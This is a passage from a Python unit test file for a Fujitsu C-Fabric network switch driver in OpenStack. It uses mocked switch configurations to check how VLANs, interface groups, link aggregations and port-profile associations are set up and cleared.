"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(
["no vfab 3 pprofile 0",
"no pprofile test-1"])
def test_dissociate_mac_from_network_still_used(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile test-1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
vfab 3 pprofile 1 vsiid mac 00:01:02:03:04:06 test-1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_still_used_in_other_vfab(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile test-1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
vfab 4 pprofile 0 vsiid mac 00:01:02:03:04:06 test-1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assert_configured(["no vfab 3 pprofile 0"])
def test_dissociate_mac_from_network_no_match(self):
mgr = self.driver.mgr
""":type : mock.MagicMock"""
mgr.get_running_config.return_value = """pprofile 1 vlan tag 2
vfab 3 pprofile 0 vsiid mac 00:01:02:03:04:05 1
"""
self.driver.dissociate_mac_from_network(
"address", "username", "password", "3", 2, "00:01:02:03:04:05")
mgr.connect.assert_called_once_with("address", "username", "password")
mgr.get_running_config.assert_called_once_with()
self.assertFalse(mgr.configure.called)
class TestCFABdriverPprofilePrefix(base.BaseTestCase):
"""Test Fujitsu C-Fabric mechanism driver for pprofile_prefix errors.
"""
def test_too_long(self):
cfg.CONF.set_override('pprofile_prefix', "a" * 29, "fujitsu_cfab")
with mock.patch(_CFABDRIVER__CFABMANAGER, autospec=True):
self.assertRaises(ValueError, cfabdriver.CFABdriver, cfg.CONF)
def test_illegal_character(self):
cfg.CONF.set_override('pprofile_prefix', '"', "fujitsu_cfab")
with mock.patch(_CFABDRIVER__CFABMANAGER, autospec=True):
self.assertRaises(ValueError, cfabdriver.CFABdriver, cfg.CONF)
class TestCFABdriverSetupVlan(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration.
"""
def setUp(self):
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverSetupVlan, self).setUp()
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.setup_vlan, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_no_preconfig_exist(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "no_preconfig"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_already_configured_vlan_but_missing_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('interface', 'add', ports=self.ports) \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_already_configured_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('interface', 'add', ports=self.ports) \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_already_configured_vlan_and_includes_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
ifgroup 2 ether 1/1/0/3
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0-2
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'replace', ifg='1-2') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1-2,0')
self.assert_configured(expect)
def test_already_configured_vlan_and_includes_between_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2
ifgroup 1 ether 1/1/0/1
ifgroup 2 ether 1/1/0/3
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0-2
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'replace', ifg='0,2') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='0,2,1')
self.assert_configured(expect)
def test_already_configured_vlan_and_not_included_in_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2
ifgroup 1 ether 1/1/0/3
ifgroup 2 ether 1/1/0/4
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0-2
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='3') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='0-2,3')
self.assert_configured(expect)
def test_exists_other_vlan_definition_missing_interface_def(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
exit
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_other_vlan_definition(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_other_vlan_definition_with_different_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 100 ether 1/1/0/1
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 100 endpoint untag 100
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_interface_def_for_target_port(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_interface_def_for_other_port(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/2
type endpoint
cfab port-mode external
lldp mode enable
exit
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_interface_def_of_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
type linkaggregation 1
exit
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exist_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "ifgroup 0 ether 1/1/0/10"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_and_reuse(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "ifgroup 0 ether 1/1/0/1"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exist_ifgroup_with_port_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1-1/1/0/5
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_port_range_and_out_of_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2-1/1/0/5
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "ifgroup 0 linkaggregation 1 1"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_lag_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1-4
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exists_lag_without_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
exit
interface 1/1/0/2
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_definition_type_is_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_lag_and_vlan_definition(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_ifgroup_ether_is_exhausted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=100)
mgr.get_candidate_config.return_value = candidate
self.assertRaises(ml2_exc.MechanismDriverError,
self.driver.setup_vlan, "a", "u", "p",
"1", 8, self.ports, self.mac)
class TestCFABdriverSetupVlanWithLAG(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration.
"""
def setUp(self):
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverSetupVlanWithLAG, self).setUp()
self.ports = "1/1/0/1,1/1/0/2"
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.setup_vlan_with_lag, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_ifgroup_ether_is_exhausted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=(i + 1))
mgr.get_candidate_config.return_value = candidate
self.assertRaises(ml2_exc.MechanismDriverError,
self.driver.setup_vlan_with_lag, "a", "u", "p",
"1", 8, self.ports, self.mac)
def test_lag_id_is_exhausted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(1, 200):
candidate += 'linkaggregation 1 {lag}\n'.format(lag=i)
mgr.get_candidate_config.return_value = candidate
self.assertRaises(ml2_exc.MechanismDriverError,
self.driver.setup_vlan_with_lag, "a", "u", "p",
"1", 8, self.ports, self.mac)
def test_no_preconfig_exist(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "no_preconfig"
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add') \
+ cfab_cmd('ifgroup', 'add', lag=True) \
+ cfab_cmd('interface', 'add', ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exist_lag_id_and_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
interface 1/1/0/1
exit
interface 1/1/0/2
exit
interface 1/1/0/3
type linkaggregation 1
exit
interface 1/1/0/4
type linkaggregation 1
exit
interface 1/1/0/5
type linkaggregation 2
exit
interface 1/1/0/6
type linkaggregation 2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 8 endpoint untag 0
vfab 1 vlan 16 endpoint untag 1
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('ifgroup', 'add', ifg='2', lag_id='3', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='3',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='0,2')
self.assert_configured(expect)
def test_illegal_exist_different_lag_id(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 8 endpoint untag 0-1
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'replace', ifg='1') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('ifgroup', 'add', ifg='2', lag_id='3', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='3',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1,2')
self.assert_configured(expect)
def test_exists_ether_vlan_definition(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1,1/1/0/2
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
interface 1/1/0/2
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
cfab.setup_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='1') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag=True) \
+ cfab_cmd('interface', 'add', ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_reuse_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
ifgroup 2 linkaggregation 1 3
interface 1/1/0/1
exit
interface 1/1/0/2
exit
interface 1/1/0/3
type linkaggregation 2
exit
interface 1/1/0/4
type linkaggregation 2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 16 endpoint untag 1
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('interface', 'add', lag_id='3', ports=self.ports,
lag=True) \
+ cfab_cmd('vlan', 'add', ifg='2')
self.assert_configured(expect)
def test_exist_lag_id_and_override(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='2') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag_id='2', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='2',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_lag_range_and_out_of_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1-2
interface 1/1/0/1
exit
interface 1/1/0/2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag_id='3', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='3',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_already_configured_lag_and_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='2') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag_id='2', lag=True) \
+ cfab_cmd('interface', 'add', ports=self.ports,
lag_id='2', lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
class TestCFABdriverClearVlan(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration."""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverClearVlan, self).setUp()
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.clear_vlan, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_ifgroup_ether_is_exhausted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=(i + 1))
mgr.get_candidate_config.return_value = candidate
ret = self.driver.clear_vlan("a", "u", "p", "1", 8,
self.ports, self.mac)
self.assertIsNone(ret)
def test_clear_with_no_command(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'delete') + cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_clear_vlan_and_assoc(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
pprofile test-1 vlan tag 8
vfab 1 vlan 8 endpoint untag 0
vfab 1 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('pp_assoc', 'delete') \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_eliminate_own_definition(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
interface 1/1/0/2
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0,1
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'replace', ifg='1') \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_eliminate_own_definition_from_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2
ifgroup 1 ether 1/1/0/3
ifgroup 2 ether 1/1/0/4
ifgroup 3 ether 1/1/0/1
ifgroup 4 ether 1/1/0/5
ifgroup 5 ether 1/1/0/6
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
interface 1/1/0/2
type endpoint
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0-5
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'replace', ifg='0-2,4-5') \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_already_cleared_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
exit
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_already_cleared_vlan_without_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endpoint
cfab port-mode external
lldp mode enable
exit
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
